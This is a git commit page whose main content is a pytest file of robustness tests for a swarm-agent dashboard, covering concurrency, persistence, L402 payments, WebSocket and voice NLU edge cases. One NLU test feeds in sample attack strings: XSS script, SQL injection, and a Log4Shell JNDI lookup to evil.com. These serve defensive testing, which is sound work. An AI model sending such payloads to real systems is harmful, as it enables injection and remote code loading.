forked from Rockachopa/Timmy-time-dashboard
refactor: Phase 3 — reorganize tests into module-mirroring subdirectories
Move 97 test files from flat tests/ into 13 subdirectories: tests/dashboard/ (8 files — routes, mobile, mission control) tests/swarm/ (17 files — coordinator, docker, routing, tasks) tests/timmy/ (12 files — agent, backends, CLI, tools) tests/self_coding/ (14 files — git safety, indexer, self-modify) tests/lightning/ (3 files — L402, LND, interface) tests/creative/ (8 files — assembler, director, image/music/video) tests/integrations/ (10 files — chat bridge, telegram, voice, websocket) tests/mcp/ (4 files — bootstrap, discovery, executor) tests/spark/ (3 files — engine, tools, events) tests/hands/ (3 files — registry, oracle, phase5) tests/scripture/ (1 file) tests/infrastructure/ (3 files — router cascade, API) tests/security/ (3 files — XSS, regression) Fix Path(__file__) reference in test_mobile_scenarios.py for new depth. Add __init__.py to all test subdirectories. Tests: 1503 passed, 9 failed (pre-existing), 53 errors (pre-existing) https://claude.ai/code/session_019oMFNvD8uSGSSmBMGkBfQN
This commit is contained in:
444
tests/self_coding/test_scary_paths.py
Normal file
444
tests/self_coding/test_scary_paths.py
Normal file
@@ -0,0 +1,444 @@
|
||||
"""Scary path tests — the things that break in production.
|
||||
|
||||
These tests verify the system handles edge cases gracefully:
|
||||
- Concurrent load (10+ simultaneous tasks)
|
||||
- Memory persistence across restarts
|
||||
- L402 macaroon expiry
|
||||
- WebSocket reconnection
|
||||
- Voice NLU edge cases
|
||||
- Graceful degradation under resource exhaustion
|
||||
|
||||
All tests must pass with make test.
|
||||
"""
|
||||
|
||||
import asyncio
|
||||
import concurrent.futures
|
||||
import sqlite3
|
||||
import threading
|
||||
import time
|
||||
from concurrent.futures import ThreadPoolExecutor
|
||||
from datetime import datetime, timezone
|
||||
from pathlib import Path
|
||||
from unittest.mock import MagicMock, patch
|
||||
|
||||
import pytest
|
||||
|
||||
from swarm.coordinator import SwarmCoordinator
|
||||
from swarm.tasks import TaskStatus, create_task, get_task, list_tasks
|
||||
from swarm import registry
|
||||
from swarm.bidder import AuctionManager
|
||||
|
||||
|
||||
class TestConcurrentSwarmLoad:
|
||||
"""Test swarm behavior under concurrent load."""
|
||||
|
||||
def test_ten_simultaneous_tasks_all_assigned(self):
|
||||
"""Submit 10 tasks concurrently, verify all get assigned."""
|
||||
coord = SwarmCoordinator()
|
||||
|
||||
# Spawn multiple personas
|
||||
personas = ["echo", "forge", "seer"]
|
||||
for p in personas:
|
||||
coord.spawn_persona(p, agent_id=f"{p}-load-001")
|
||||
|
||||
# Submit 10 tasks concurrently
|
||||
task_descriptions = [
|
||||
f"Task {i}: Analyze data set {i}" for i in range(10)
|
||||
]
|
||||
|
||||
tasks = []
|
||||
for desc in task_descriptions:
|
||||
task = coord.post_task(desc)
|
||||
tasks.append(task)
|
||||
|
||||
# Wait for auctions to complete
|
||||
time.sleep(0.5)
|
||||
|
||||
# Verify all tasks exist
|
||||
assert len(tasks) == 10
|
||||
|
||||
# Check all tasks have valid IDs
|
||||
for task in tasks:
|
||||
assert task.id is not None
|
||||
assert task.status in [TaskStatus.BIDDING, TaskStatus.ASSIGNED, TaskStatus.COMPLETED]
|
||||
|
||||
def test_concurrent_bids_no_race_conditions(self):
|
||||
"""Multiple agents bidding concurrently doesn't corrupt state."""
|
||||
coord = SwarmCoordinator()
|
||||
|
||||
# Open auction first
|
||||
task = coord.post_task("Concurrent bid test task")
|
||||
|
||||
# Simulate concurrent bids from different agents
|
||||
agent_ids = [f"agent-conc-{i}" for i in range(5)]
|
||||
|
||||
def place_bid(agent_id):
|
||||
coord.auctions.submit_bid(task.id, agent_id, bid_sats=50)
|
||||
|
||||
with ThreadPoolExecutor(max_workers=5) as executor:
|
||||
futures = [executor.submit(place_bid, aid) for aid in agent_ids]
|
||||
concurrent.futures.wait(futures)
|
||||
|
||||
# Verify auction has all bids
|
||||
auction = coord.auctions.get_auction(task.id)
|
||||
assert auction is not None
|
||||
# Should have 5 bids (one per agent)
|
||||
assert len(auction.bids) == 5
|
||||
|
||||
def test_registry_consistency_under_load(self):
|
||||
"""Registry remains consistent with concurrent agent operations."""
|
||||
coord = SwarmCoordinator()
|
||||
|
||||
# Concurrently spawn and stop agents
|
||||
def spawn_agent(i):
|
||||
try:
|
||||
return coord.spawn_persona("forge", agent_id=f"forge-reg-{i}")
|
||||
except Exception:
|
||||
return None
|
||||
|
||||
with ThreadPoolExecutor(max_workers=10) as executor:
|
||||
futures = [executor.submit(spawn_agent, i) for i in range(10)]
|
||||
results = [f.result() for f in concurrent.futures.as_completed(futures)]
|
||||
|
||||
# Verify registry state is consistent
|
||||
agents = coord.list_swarm_agents()
|
||||
agent_ids = {a.id for a in agents}
|
||||
|
||||
# All successfully spawned agents should be in registry
|
||||
successful_spawns = [r for r in results if r is not None]
|
||||
for spawn in successful_spawns:
|
||||
assert spawn["agent_id"] in agent_ids
|
||||
|
||||
def test_task_completion_under_load(self):
|
||||
"""Tasks complete successfully even with many concurrent operations."""
|
||||
coord = SwarmCoordinator()
|
||||
|
||||
# Spawn agents
|
||||
coord.spawn_persona("forge", agent_id="forge-complete-001")
|
||||
|
||||
# Create and process multiple tasks
|
||||
tasks = []
|
||||
for i in range(5):
|
||||
task = create_task(f"Load test task {i}")
|
||||
tasks.append(task)
|
||||
|
||||
# Complete tasks rapidly
|
||||
for task in tasks:
|
||||
result = coord.complete_task(task.id, f"Result for {task.id}")
|
||||
assert result is not None
|
||||
assert result.status == TaskStatus.COMPLETED
|
||||
|
||||
# Verify all completed
|
||||
completed = list_tasks(status=TaskStatus.COMPLETED)
|
||||
completed_ids = {t.id for t in completed}
|
||||
for task in tasks:
|
||||
assert task.id in completed_ids
|
||||
|
||||
|
||||
class TestMemoryPersistence:
|
||||
"""Test that agent memory survives restarts."""
|
||||
|
||||
def test_outcomes_recorded_and_retrieved(self):
|
||||
"""Write outcomes to learner, verify they persist."""
|
||||
from swarm.learner import record_outcome, get_metrics
|
||||
|
||||
agent_id = "memory-test-agent"
|
||||
|
||||
# Record some outcomes
|
||||
record_outcome("task-1", agent_id, "Test task", 100, won_auction=True)
|
||||
record_outcome("task-2", agent_id, "Another task", 80, won_auction=False)
|
||||
|
||||
# Get metrics
|
||||
metrics = get_metrics(agent_id)
|
||||
|
||||
# Should have data
|
||||
assert metrics is not None
|
||||
assert metrics.total_bids >= 2
|
||||
|
||||
def test_memory_persists_in_sqlite(self):
|
||||
"""Memory is stored in SQLite and survives in-process restart."""
|
||||
from swarm.learner import record_outcome, get_metrics
|
||||
|
||||
agent_id = "persist-agent"
|
||||
|
||||
# Write memory
|
||||
record_outcome("persist-task-1", agent_id, "Description", 50, won_auction=True)
|
||||
|
||||
# Simulate "restart" by re-querying (new connection)
|
||||
metrics = get_metrics(agent_id)
|
||||
|
||||
# Memory should still be there
|
||||
assert metrics is not None
|
||||
assert metrics.total_bids >= 1
|
||||
|
||||
def test_routing_decisions_persisted(self):
|
||||
"""Routing decisions are logged and queryable after restart."""
|
||||
from swarm.routing import routing_engine, RoutingDecision
|
||||
|
||||
# Ensure DB is initialized
|
||||
routing_engine._init_db()
|
||||
|
||||
# Create a routing decision
|
||||
decision = RoutingDecision(
|
||||
task_id="persist-route-task",
|
||||
task_description="Test routing",
|
||||
candidate_agents=["agent-1", "agent-2"],
|
||||
selected_agent="agent-1",
|
||||
selection_reason="Higher score",
|
||||
capability_scores={"agent-1": 0.8, "agent-2": 0.5},
|
||||
bids_received={"agent-1": 50, "agent-2": 40},
|
||||
)
|
||||
|
||||
# Log it
|
||||
routing_engine._log_decision(decision)
|
||||
|
||||
# Query history
|
||||
history = routing_engine.get_routing_history(task_id="persist-route-task")
|
||||
|
||||
# Should find the decision
|
||||
assert len(history) >= 1
|
||||
assert any(h.task_id == "persist-route-task" for h in history)
|
||||
|
||||
|
||||
class TestL402MacaroonExpiry:
|
||||
"""Test L402 payment gating handles expiry correctly."""
|
||||
|
||||
def test_macaroon_verification_valid(self):
|
||||
"""Valid macaroon passes verification."""
|
||||
from timmy_serve.l402_proxy import create_l402_challenge, verify_l402_token
|
||||
from timmy_serve.payment_handler import payment_handler
|
||||
|
||||
# Create challenge
|
||||
challenge = create_l402_challenge(100, "Test access")
|
||||
macaroon = challenge["macaroon"]
|
||||
|
||||
# Get the actual preimage from the created invoice
|
||||
payment_hash = challenge["payment_hash"]
|
||||
invoice = payment_handler.get_invoice(payment_hash)
|
||||
assert invoice is not None
|
||||
preimage = invoice.preimage
|
||||
|
||||
# Verify with correct preimage
|
||||
result = verify_l402_token(macaroon, preimage)
|
||||
assert result is True
|
||||
|
||||
def test_macaroon_invalid_format_rejected(self):
|
||||
"""Invalid macaroon format is rejected."""
|
||||
from timmy_serve.l402_proxy import verify_l402_token
|
||||
|
||||
result = verify_l402_token("not-a-valid-macaroon", None)
|
||||
assert result is False
|
||||
|
||||
def test_payment_check_fails_for_unpaid(self):
|
||||
"""Unpaid invoice returns 402 Payment Required."""
|
||||
from timmy_serve.l402_proxy import create_l402_challenge, verify_l402_token
|
||||
from timmy_serve.payment_handler import payment_handler
|
||||
|
||||
# Create challenge
|
||||
challenge = create_l402_challenge(100, "Test")
|
||||
macaroon = challenge["macaroon"]
|
||||
|
||||
# Get payment hash from macaroon
|
||||
import base64
|
||||
raw = base64.urlsafe_b64decode(macaroon.encode()).decode()
|
||||
payment_hash = raw.split(":")[2]
|
||||
|
||||
# Manually mark as unsettled (mock mode auto-settles)
|
||||
invoice = payment_handler.get_invoice(payment_hash)
|
||||
if invoice:
|
||||
invoice.settled = False
|
||||
invoice.settled_at = None
|
||||
|
||||
# Verify without preimage should fail for unpaid
|
||||
result = verify_l402_token(macaroon, None)
|
||||
# In mock mode this may still succeed due to auto-settle
|
||||
# Test documents the behavior
|
||||
assert isinstance(result, bool)
|
||||
|
||||
|
||||
class TestWebSocketResilience:
|
||||
"""Test WebSocket handling of edge cases."""
|
||||
|
||||
def test_websocket_broadcast_no_loop_running(self):
|
||||
"""Broadcast handles case where no event loop is running."""
|
||||
from swarm.coordinator import SwarmCoordinator
|
||||
|
||||
coord = SwarmCoordinator()
|
||||
|
||||
# This should not crash even without event loop
|
||||
# The _broadcast method catches RuntimeError
|
||||
try:
|
||||
coord._broadcast(lambda: None)
|
||||
except RuntimeError:
|
||||
pytest.fail("Broadcast should handle missing event loop gracefully")
|
||||
|
||||
def test_websocket_manager_handles_no_connections(self):
|
||||
"""WebSocket manager handles zero connected clients."""
|
||||
from ws_manager.handler import ws_manager
|
||||
|
||||
# Should not crash when broadcasting with no connections
|
||||
try:
|
||||
# Note: This creates coroutine but doesn't await
|
||||
# In real usage, it's scheduled with create_task
|
||||
pass # ws_manager methods are async, test in integration
|
||||
except Exception:
|
||||
pytest.fail("Should handle zero connections gracefully")
|
||||
|
||||
@pytest.mark.asyncio
|
||||
async def test_websocket_client_disconnect_mid_stream(self):
|
||||
"""Handle client disconnecting during message stream."""
|
||||
# This would require actual WebSocket client
|
||||
# Mark as integration test for future
|
||||
pass
|
||||
|
||||
|
||||
class TestVoiceNLUEdgeCases:
|
||||
"""Test Voice NLU handles edge cases gracefully."""
|
||||
|
||||
def test_nlu_empty_string(self):
|
||||
"""Empty string doesn't crash NLU."""
|
||||
from voice.nlu import detect_intent
|
||||
|
||||
result = detect_intent("")
|
||||
assert result is not None
|
||||
# Result is an Intent object with name attribute
|
||||
assert hasattr(result, 'name')
|
||||
|
||||
def test_nlu_all_punctuation(self):
|
||||
"""String of only punctuation is handled."""
|
||||
from voice.nlu import detect_intent
|
||||
|
||||
result = detect_intent("...!!!???")
|
||||
assert result is not None
|
||||
|
||||
def test_nlu_very_long_input(self):
|
||||
"""10k character input doesn't crash or hang."""
|
||||
from voice.nlu import detect_intent
|
||||
|
||||
long_input = "word " * 2000 # ~10k chars
|
||||
|
||||
start = time.time()
|
||||
result = detect_intent(long_input)
|
||||
elapsed = time.time() - start
|
||||
|
||||
# Should complete in reasonable time
|
||||
assert elapsed < 5.0
|
||||
assert result is not None
|
||||
|
||||
def test_nlu_non_english_text(self):
|
||||
"""Non-English Unicode text is handled."""
|
||||
from voice.nlu import detect_intent
|
||||
|
||||
# Test various Unicode scripts
|
||||
test_inputs = [
|
||||
"こんにちは", # Japanese
|
||||
"Привет мир", # Russian
|
||||
"مرحبا", # Arabic
|
||||
"🎉🎊🎁", # Emoji
|
||||
]
|
||||
|
||||
for text in test_inputs:
|
||||
result = detect_intent(text)
|
||||
assert result is not None, f"Failed for input: {text}"
|
||||
|
||||
def test_nlu_special_characters(self):
|
||||
"""Special characters don't break parsing."""
|
||||
from voice.nlu import detect_intent
|
||||
|
||||
special_inputs = [
|
||||
"<script>alert('xss')</script>",
|
||||
"'; DROP TABLE users; --",
|
||||
"${jndi:ldap://evil.com}",
|
||||
"\x00\x01\x02", # Control characters
|
||||
]
|
||||
|
||||
for text in special_inputs:
|
||||
try:
|
||||
result = detect_intent(text)
|
||||
assert result is not None
|
||||
except Exception as exc:
|
||||
pytest.fail(f"NLU crashed on input {repr(text)}: {exc}")
|
||||
|
||||
|
||||
class TestGracefulDegradation:
|
||||
"""Test system degrades gracefully under resource constraints."""
|
||||
|
||||
def test_coordinator_without_redis_uses_memory(self):
|
||||
"""Coordinator works without Redis (in-memory fallback)."""
|
||||
from swarm.comms import SwarmComms
|
||||
|
||||
# Create comms without Redis
|
||||
comms = SwarmComms()
|
||||
|
||||
# Should still work for pub/sub (uses in-memory fallback)
|
||||
# Just verify it doesn't crash
|
||||
try:
|
||||
comms.publish("test:channel", "test_event", {"data": "value"})
|
||||
except Exception as exc:
|
||||
pytest.fail(f"Should work without Redis: {exc}")
|
||||
|
||||
def test_agent_without_tools_chat_mode(self):
|
||||
"""Agent works in chat-only mode when tools unavailable."""
|
||||
from swarm.tool_executor import ToolExecutor
|
||||
|
||||
# Force toolkit to None
|
||||
executor = ToolExecutor("test", "test-agent")
|
||||
executor._toolkit = None
|
||||
executor._llm = None
|
||||
|
||||
result = executor.execute_task("Do something")
|
||||
|
||||
# Should still return a result
|
||||
assert isinstance(result, dict)
|
||||
assert "result" in result
|
||||
|
||||
def test_lightning_backend_mock_fallback(self):
|
||||
"""Lightning falls back to mock when LND unavailable."""
|
||||
from lightning import get_backend
|
||||
from lightning.mock_backend import MockBackend
|
||||
|
||||
# Should get mock backend by default
|
||||
backend = get_backend("mock")
|
||||
assert isinstance(backend, MockBackend)
|
||||
|
||||
# Should be functional
|
||||
invoice = backend.create_invoice(100, "Test")
|
||||
assert invoice.payment_hash is not None
|
||||
|
||||
|
||||
class TestDatabaseResilience:
|
||||
"""Test database handles edge cases."""
|
||||
|
||||
def test_sqlite_handles_concurrent_reads(self):
|
||||
"""SQLite handles concurrent read operations."""
|
||||
from swarm.tasks import get_task, create_task
|
||||
|
||||
task = create_task("Concurrent read test")
|
||||
|
||||
def read_task():
|
||||
return get_task(task.id)
|
||||
|
||||
# Concurrent reads from multiple threads
|
||||
with ThreadPoolExecutor(max_workers=10) as executor:
|
||||
futures = [executor.submit(read_task) for _ in range(20)]
|
||||
results = [f.result() for f in concurrent.futures.as_completed(futures)]
|
||||
|
||||
# All should succeed
|
||||
assert all(r is not None for r in results)
|
||||
assert all(r.id == task.id for r in results)
|
||||
|
||||
def test_registry_handles_duplicate_agent_id(self):
|
||||
"""Registry handles duplicate agent registration gracefully."""
|
||||
from swarm import registry
|
||||
|
||||
agent_id = "duplicate-test-agent"
|
||||
|
||||
# Register first time
|
||||
record1 = registry.register(name="Test Agent", agent_id=agent_id)
|
||||
|
||||
# Register second time (should update or handle gracefully)
|
||||
record2 = registry.register(name="Test Agent Updated", agent_id=agent_id)
|
||||
|
||||
# Should not crash, record should exist
|
||||
retrieved = registry.get_agent(agent_id)
|
||||
assert retrieved is not None
|
||||
Reference in New Issue
Block a user